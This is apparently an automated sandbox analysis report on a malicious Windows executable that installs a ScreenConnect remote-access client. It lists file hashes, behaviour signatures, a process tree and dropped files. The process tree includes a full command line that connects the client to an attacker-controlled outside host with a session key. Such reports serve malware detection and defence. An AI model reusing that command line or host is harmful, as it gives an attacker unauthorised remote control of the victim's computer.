Analysis

  • max time kernel
    139s
  • max time network
    120s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-10-2024 14:23

General

  • Target

    defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe

  • Size

    81KB

  • MD5

    ac8ba753feb59c96683b599a6b5e4988

  • SHA1

    645ebe7d11b42abad125975786c32815e6150e13

  • SHA256

    defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023

  • SHA512

    21aa3342a55ce8af1b809c560f41ad4e5922f50cf394a74af7a35c93c81b6109d1a00afd6806b240b4e8c8a83a96d8981a04059382295d2a0f1b7b45b7df3909

  • SSDEEP

    1536:BoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYF7mxDE:7enkyfPAwiMq0RqRfbaxZJYYFD

Malware Config

Signatures

  • Manipulates Digital Signatures 1 TTPs 2 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Drops file in System32 directory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 16 IoCs
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe
    "C:\Users\Admin\AppData\Local\Temp\defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe"
    1⤵
    • Manipulates Digital Signatures
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
      2⤵
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4756
      • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe
        "C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe"
        3⤵
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:4052
        • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe
          "C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=3b776ead-f4ad-41e1-88d0-71a737ecbd10&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1004
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 836
      2⤵
      • Program crash
      PID:4212
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2152 -ip 2152
    1⤵
      PID:1232
    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=3b776ead-f4ad-41e1-88d0-71a737ecbd10&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
      1⤵
      • Sets service image path in registry
      • Drops file in System32 directory
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4464
      • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe
        "C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe" "RunRole" "4d9067e0-5a30-46d7-a755-11b764bcf3f7" "User"
        2⤵
        • Drops file in System32 directory
        • Executes dropped EXE
        PID:2720

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.cdf-ms

      Filesize

      24KB

      MD5

      3bff7b857a8b5ccb780903e4e9f8465e

      SHA1

      841ebbf82569a2b5c2fa2c9fa3ddf8e01e6ae8d7

      SHA256

      3ae149dde86b86ff71a493f91468267549029096d7f93b5cae0420b524df37ab

      SHA512

      784d94f3790ac53422d2c8ac787b4280bbbbb4bd6009ce47defb3ece54bd2d676b99ee93b1e609b2624e017b0931c8d49c5cedfbd5299509d58b94052760bbe5

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.cdf-ms

      Filesize

      3KB

      MD5

      2abf2ffb6b583ec5918c467af0dd9731

      SHA1

      1a4d8ed5884848577df82e1a7c761ccf88fdfdb1

      SHA256

      d483f12f388f801037ef92761f53a5452fdcf362d4fda64390e2aa84eeb6b0d5

      SHA512

      9a2dc76525a18bc8e009715cdfc6dbe44603513c340f6c6de8d7dca7677e816e5c5ca8b07e76786aa9ff4be9030e4321e2598620d3319cdd9d6b28cb3f561979

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.cdf-ms

      Filesize

      5KB

      MD5

      0a60c6abc0287591ffd6e73ff7ff18b1

      SHA1

      fa4af656314d47938d10efa5356896e1d9da84b6

      SHA256

      4163a05061cd5f3a926c21d32bc9a0c32242dedd60d767ea2ba778363a6067c8

      SHA512

      c4e94809ece652b08ff2763f64e6a7a977a67d3ffc2d899d2ae2b7379a22b196e74ef9032380350509410eea3dc18e93dc94b33d907e04d311f7af6e546e0f1d

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.cdf-ms

      Filesize

      6KB

      MD5

      c3ae416ab198d42ef07c020dbc165729

      SHA1

      19e8e7b3b913dad6c582f1a8d125b0bc7fdf4153

      SHA256

      1ff25b0d1528ac1c5efa1698a19678787159eb9720eb64ab248bc2c6dd53bfec

      SHA512

      091aab1c08a14ec0225b92131c0776c8062f6a150e3d54c8c8c67ee7961b9948024786a17388122fee4bfe6ca10820e1bfcc69c3da0608eaaf97b8e743cb77d7

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.cdf-ms

      Filesize

      2KB

      MD5

      9453588dafb87c630f5f8e27d255d4de

      SHA1

      b288f27496e5b076e0f4d97773d0994312221333

      SHA256

      78191840c0b84135cc17ac9df68269a717bb73b9bf6424da766e82d4cd22a510

      SHA512

      7f50cd511a6137f0e2d8c462374f6840b8d0f76b5dbfa4b79fd98df7252656d2b7433e79798cef2e06a7f77a51a073e7b1eea2fad9162cdc0a428e8aa287ddbf

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.cdf-ms

      Filesize

      14KB

      MD5

      eb94822e4a46aacf1ed71121e8eae65c

      SHA1

      e364316094cc66c148094f31dc36e9af246ca778

      SHA256

      3b5db90e505bc36c6abb6208169c1f216e30e405dc789c4bb052403555427647

      SHA512

      0d17e3d8b91d80e70d436a7bd9333426bd8a429cc4c9525734eeb11b5e66674886ea4b6c62d64a6d2248440a1afcfb6c06a9c088f85f8f9c8068ff38a05afc86

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.cdf-ms

      Filesize

      4KB

      MD5

      25146757f8098eb129e92f0de59e00d5

      SHA1

      590205ead0b22d2fc7937cd3d2b7c0567ca50414

      SHA256

      d38f152997dab583ecb0c28ae74db640d923b003f7a6c05089cb67f0a9b720f7

      SHA512

      e13d81aa66922c7dc5e124bbe27fdbb2ae7ca251497f876c60322c48d338fa135f0df908e323e02538f7342613340c5b9d73799945e831a4ed80b6897dacbf8f

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe

      Filesize

      93KB

      MD5

      361bcc2cb78c75dd6f583af81834e447

      SHA1

      1e2255ec312c519220a4700a079f02799ccd21d6

      SHA256

      512f9d035e6e88e231f082cc7f0ff661afa9acc221cf38f7ba3721fd996a05b7

      SHA512

      94ba891140e7ddb2efa8183539490ac1b4e51e3d5bd0a4001692dd328040451e6f500a7fc3da6c007d9a48db3e6337b252ce8439e912d4fe7adc762206d75f44

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\Client.Override.en-US.resources

      Filesize

      289B

      MD5

      5a9944427c35328cb2d7e201cd705c32

      SHA1

      c58f7761a80cc65e12cc48ad459151dd7e02b2ea

      SHA256

      333cf59f6d5e060600bd0e001643fecc11e91743a9757ab2192c4cf9b3cb6c01

      SHA512

      af0132f5d7da2fdc869bd4889700fb4f3a8017159931cbe7861251c1b33ea4fa28331e1059e129c4ba6af9878a1367ba531d412ae9dc13f143edebc6855114d0

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\Client.Override.resources

      Filesize

      257B

      MD5

      c72d7889b5e0bb8ac27b83759f108bd8

      SHA1

      2becc870db304a8f28faab199ae6834b97385551

      SHA256

      3b231ff84cbcbb76390bd9560246bed20b5f3182a89eaf1d691cb782e194b96e

      SHA512

      2d38a847e6dd5ad146bd46de88b9f37075c992e50f9d04ccef96f77a1e21f852599a57ce2360e71b99a1ccbc5e3750d37fdb747267ea58a9b76122083fb6a390

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\Client.en-US.resources

      Filesize

      48KB

      MD5

      d524e8e6fd04b097f0401b2b668db303

      SHA1

      9486f89ce4968e03f6dcd082aa2e4c05aef46fcc

      SHA256

      07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4

      SHA512

      e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\Client.resources

      Filesize

      26KB

      MD5

      5cd580b22da0c33ec6730b10a6c74932

      SHA1

      0b6bded7936178d80841b289769c6ff0c8eead2d

      SHA256

      de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

      SHA512

      c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\app.config

      Filesize

      1KB

      MD5

      2744e91bb44e575ad8e147e06f8199e3

      SHA1

      6795c6b8f0f2dc6d8bd39f9cf971bab81556b290

      SHA256

      805e6e9447a4838d874d84e6b2cdff93723641b06726d8ee58d51e8b651cd226

      SHA512

      586edc48a71fa17cdf092a95d27fce2341c023b8ea4d93fa2c86ca9b3b3e056fd69bd3644edbad1224297bce9646419036ea442c93778985f839e14776f51498

    • C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\user.config

      Filesize

      565B

      MD5

      6dbc62005688cd72f38049c2722e4ff5

      SHA1

      eccd569adbde97455b2c041932ef70b569d30106

      SHA256

      4510625f7129d91c74e14ad78140334b8365390dc3f6a2d55a406cfaf39932be

      SHA512

      4aca77693fdc8f146db7944f36303e30ca9cf6e22961b887d3e6960686c2420668272e9ce981984eaa29ca755c23bdfe56f26662ebec616357c230d1f3d4db8a

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

      Filesize

      1KB

      MD5

      efd934620fb989581d19963e3fbb6d58

      SHA1

      63b103bb53e254a999eb842ef90462f208e20162

      SHA256

      3af88293fb19b74f43b351ed49ccc031727f389c7ca509eece181da5763a492f

      SHA512

      6061817547280c5cf5d2cd50fa76b92aa9c1cfc433f17d6b545192e1098281394562adb773931cecd15d1b594d3b9c03855b70682fe6c54df5912c185b54670b

    • C:\Users\Admin\AppData\Local\Temp\Deployment\5YEM4B7D.NG0\RVG5LQ76.BAB.application

      Filesize

      115KB

      MD5

      4e152d84c20ab6330ff0cf47a9af7c6d

      SHA1

      018f32d833124056fccfc200318542687d0e5565

      SHA256

      5668723c31f6726947dfeda324b26d27f7e899647c22a4b1b2bea935ba8a6b10

      SHA512

      2f3f6b397072b795c74c44f19012483e2785ddee5a7f5d7e38c566ebc9a94ae084504061f697db714b933b79824cbc6b08b7718536a19fa21d11ad8d0f8afb79

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.Client.dll

      Filesize

      192KB

      MD5

      ae0e6eba123683a59cae340c894260e9

      SHA1

      35a6f5eb87179eb7252131a881a8d5d4d9906013

      SHA256

      d37f58aae6085c89edd3420146eb86d5a108d27586cb4f24f9b580208c9b85f1

      SHA512

      1b6d4ad78c2643a861e46159d5463ba3ec5a23a2a3de1575e22fdcccd906ee4e9112d3478811ab391a130fa595306680b8608b245c1eecb11c5bce098f601d6b

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.Client.dll.genman

      Filesize

      1KB

      MD5

      2ea1ac1e39b8029aa1d1cebb1079c706

      SHA1

      5788c00093d358f8b3d8a98b0bef5d0703031e3f

      SHA256

      8965728d1e348834e3f1e2502061dfb9db41478acb719fe474fa2969078866e7

      SHA512

      6b2a8ac25bbfe4d1ec7b9a9af8fe7e6f92c39097bcfd7e9e9be070e1a56718ebefffa5b24688754724edbffa8c96dcfcaa0c86cc849a203c1f5423e920e64566

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.ClientService.dll

      Filesize

      66KB

      MD5

      0402cf8ae8d04fcc3f695a7bb9548aa0

      SHA1

      044227fa43b7654032524d6f530f5e9b608e5be4

      SHA256

      c76f1f28c5289758b6bd01769c5ebfb519ee37d0fa8031a13bb37de83d849e5e

      SHA512

      be4cbc906ec3d189bebd948d3d44fcf7617ffae4cc3c6dc49bf4c0bd809a55ce5f8cd4580e409e5bce7586262fbaf642085fa59fe55b60966db48d81ba8c0d78

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.ClientService.dll.genman

      Filesize

      1KB

      MD5

      e11e5d85f8857144751d60ced3fae6d7

      SHA1

      7e0ae834c6b1dea46b51c3101852afeea975d572

      SHA256

      ed9436cba40c9d573e7063f2ac2c5162d40bfd7f7fec4af2beed954560d268f9

      SHA512

      5a2ccf4f02e5acc872a8b421c3611312a3608c25ec7b28a858034342404e320260457bd0c30eaefef6244c0e3305970ac7d9fc64ece8f33f92f8ad02d4e5fab0

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.Core.dll

      Filesize

      536KB

      MD5

      16c4f1e36895a0fa2b4da3852085547a

      SHA1

      ab068a2f4ffd0509213455c79d311f169cd7cab8

      SHA256

      4d4bf19ad99827f63dd74649d8f7244fc8e29330f4d80138c6b64660c8190a53

      SHA512

      ab4e67be339beca30cab042c9ebea599f106e1e0e2ee5a10641beef431a960a2e722a459534bdc7c82c54f523b21b4994c2e92aa421650ee4d7e0f6db28b47ba

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.Core.dll.genman

      Filesize

      1KB

      MD5

      2343364bac7a96205eb525addc4bbfd1

      SHA1

      9cba0033acb4af447772cd826ec3a9c68d6a3ccc

      SHA256

      e9d6a0964fbfb38132a07425f82c6397052013e43feedcdc963a58b6fb9148e7

      SHA512

      ab4d01b599f89fe51b0ffe58fc82e9ba6d2b1225dbe8a3ce98f71dce0405e2521fca7047974bafb6255e675cd9b3d8087d645b7ad33d2c6b47b02b7982076710

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.Windows.dll

      Filesize

      1.6MB

      MD5

      9f823778701969823c5a01ef3ece57b7

      SHA1

      da733f482825ec2d91f9f1186a3f934a2ea21fa1

      SHA256

      abca7cf12937da14c9323c880ec490cc0e063d7a3eef2eac878cd25c84cf1660

      SHA512

      ffc40b16f5ea2124629d797dc3a431beb929373bfa773c6cddc21d0dc4105d7360a485ea502ce8ea3b12ee8dca8275a0ec386ea179093af3aa8b31b4dd3ae1ca

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.Windows.dll.genman

      Filesize

      1KB

      MD5

      50fc8e2b16cc5920b0536c1f5dd4aeae

      SHA1

      6060c72b1a84b8be7bac2acc9c1cebd95736f3d6

      SHA256

      95855ef8e55a75b5b0b17207f8b4ba9370cd1e5b04bcd56976973fd4e731454a

      SHA512

      bd40e38cac8203d8e33f0f7e50e2cab9cfb116894d6ca2d2d3d369e277d93cda45a31e8345afc3039b20dd4118dc8296211badffa3f1b81e10d14298dd842d05

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.WindowsBackstageShell.exe

      Filesize

      59KB

      MD5

      6df2def5e591e2481e42924b327a9f15

      SHA1

      38eab6e9d99b5caeec9703884d25be8d811620a9

      SHA256

      b6a05985c4cf111b94a4ef83f6974a70bf623431187691f2d4be0332f3899da9

      SHA512

      5724a20095893b722e280dbf382c9bfbe75dd4707a98594862760cbbd5209c1e55eeaf70ad23fa555d62c7f5e54de1407fb98fc552f42dccba5d60800965c6a5

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.WindowsClient.exe

      Filesize

      587KB

      MD5

      20ab8141d958a58aade5e78671a719bf

      SHA1

      f914925664ab348081dafe63594a64597fb2fc43

      SHA256

      9cfd2c521d6d41c3a86b6b2c3d9b6a042b84f2f192f988f65062f0e1bfd99cab

      SHA512

      c5dd5ed90c516948d3d8c6dfa3ca7a6c8207f062883ba442d982d8d05a7db0707afec3a0cb211b612d04ccd0b8571184fc7e81b2e98ae129e44c5c0e592a5563

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.WindowsClient.exe.config

      Filesize

      266B

      MD5

      728175e20ffbceb46760bb5e1112f38b

      SHA1

      2421add1f3c9c5ed9c80b339881d08ab10b340e3

      SHA256

      87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

      SHA512

      fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.WindowsClient.exe.genman

      Filesize

      2KB

      MD5

      3133de245d1c278c1c423a5e92af63b6

      SHA1

      d75c7d2f1e6b49a43b2f879f6ef06a00208eb6dc

      SHA256

      61578953c28272d15e8db5fd1cffb26e7e16b52ada7b1b41416232ae340002b7

      SHA512

      b22d4ec1d99fb6668579fa91e70c182bec27f2e6b4ff36223a018a066d550f4e90aac3dffd8c314e0d99b9f67447613ca011f384f693c431a7726ce0665d7647

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.WindowsClient.exe.manifest

      Filesize

      17KB

      MD5

      1dc9dd74a43d10c5f1eae50d76856f36

      SHA1

      e4080b055dd3a290db546b90bcf6c5593ff34f6d

      SHA256

      291fa1f674be3ca15cfbab6f72ed1033b5dd63bcb4aea7fbc79fdcb6dd97ac0a

      SHA512

      91e8a1a1aea08e0d3cf20838b92f75fa7a5f5daca9aead5ab7013d267d25d4bf3d291af2ca0cce8b73027d9717157c2c915f2060b2262bac753bbc159055dbdf

    • C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.WindowsFileManager.exe

      Filesize

      79KB

      MD5

      b1799a5a5c0f64e9d61ee4ba465afe75

      SHA1

      7785da04e98e77fec7c9e36b8c68864449724d71

      SHA256

      7c39e98beb59d903bc8d60794b1a3c4ce786f7a7aae3274c69b507eba94faa80

      SHA512

      ad8c810d7cc3ea5198ee50f0ceb091a9f975276011b13b10a37306052697dc43e58a16c84fa97ab02d3927cd0431f62aef27e500030607828b2129f305c27be8

    • memory/1004-385-0x00000000052F0000-0x000000000537C000-memory.dmp

      Filesize

      560KB

    • memory/1004-380-0x0000000002D90000-0x0000000002DA8000-memory.dmp

      Filesize

      96KB

    • memory/2720-413-0x0000000002480000-0x0000000002498000-memory.dmp

      Filesize

      96KB

    • memory/4052-348-0x0000000000080000-0x0000000000116000-memory.dmp

      Filesize

      600KB

    • memory/4464-404-0x0000000004170000-0x0000000004202000-memory.dmp

      Filesize

      584KB

    • memory/4464-403-0x0000000003EA0000-0x0000000003ED6000-memory.dmp

      Filesize

      216KB

    • memory/4464-400-0x0000000003E50000-0x0000000003EA0000-memory.dmp

      Filesize

      320KB

    • memory/4464-399-0x0000000004680000-0x0000000004C24000-memory.dmp

      Filesize

      5.6MB

    • memory/4464-398-0x0000000003F20000-0x00000000040CA000-memory.dmp

      Filesize

      1.7MB

    • memory/4756-10-0x0000023538340000-0x0000023538390000-memory.dmp

      Filesize

      320KB

    • memory/4756-52-0x000002353AC00000-0x000002353ADAA000-memory.dmp

      Filesize

      1.7MB

    • memory/4756-7-0x00007FFC4AED0000-0x00007FFC4B991000-memory.dmp

      Filesize

      10.8MB

    • memory/4756-64-0x000002353A930000-0x000002353A9BC000-memory.dmp

      Filesize

      560KB

    • memory/4756-30-0x00007FFC4AED0000-0x00007FFC4B991000-memory.dmp

      Filesize

      10.8MB

    • memory/4756-40-0x00000235383D0000-0x0000023538406000-memory.dmp

      Filesize

      216KB

    • memory/4756-46-0x0000023538390000-0x00000235383A8000-memory.dmp

      Filesize

      96KB

    • memory/4756-0-0x00007FFC4AED3000-0x00007FFC4AED5000-memory.dmp

      Filesize

      8KB

    • memory/4756-6-0x00007FFC4AED0000-0x00007FFC4B991000-memory.dmp

      Filesize

      10.8MB

    • memory/4756-5-0x00007FFC4AED3000-0x00007FFC4AED5000-memory.dmp

      Filesize

      8KB

    • memory/4756-4-0x00007FFC4AED0000-0x00007FFC4B991000-memory.dmp

      Filesize

      10.8MB

    • memory/4756-3-0x00007FFC4AED0000-0x00007FFC4B991000-memory.dmp

      Filesize

      10.8MB

    • memory/4756-2-0x00000235368E0000-0x0000023536A66000-memory.dmp

      Filesize

      1.5MB

    • memory/4756-58-0x000002353A940000-0x000002353A9D6000-memory.dmp

      Filesize

      600KB

    • memory/4756-1-0x000002351C3A0000-0x000002351C3A8000-memory.dmp

      Filesize

      32KB

    • memory/4756-416-0x00007FFC4AED0000-0x00007FFC4B991000-memory.dmp

      Filesize

      10.8MB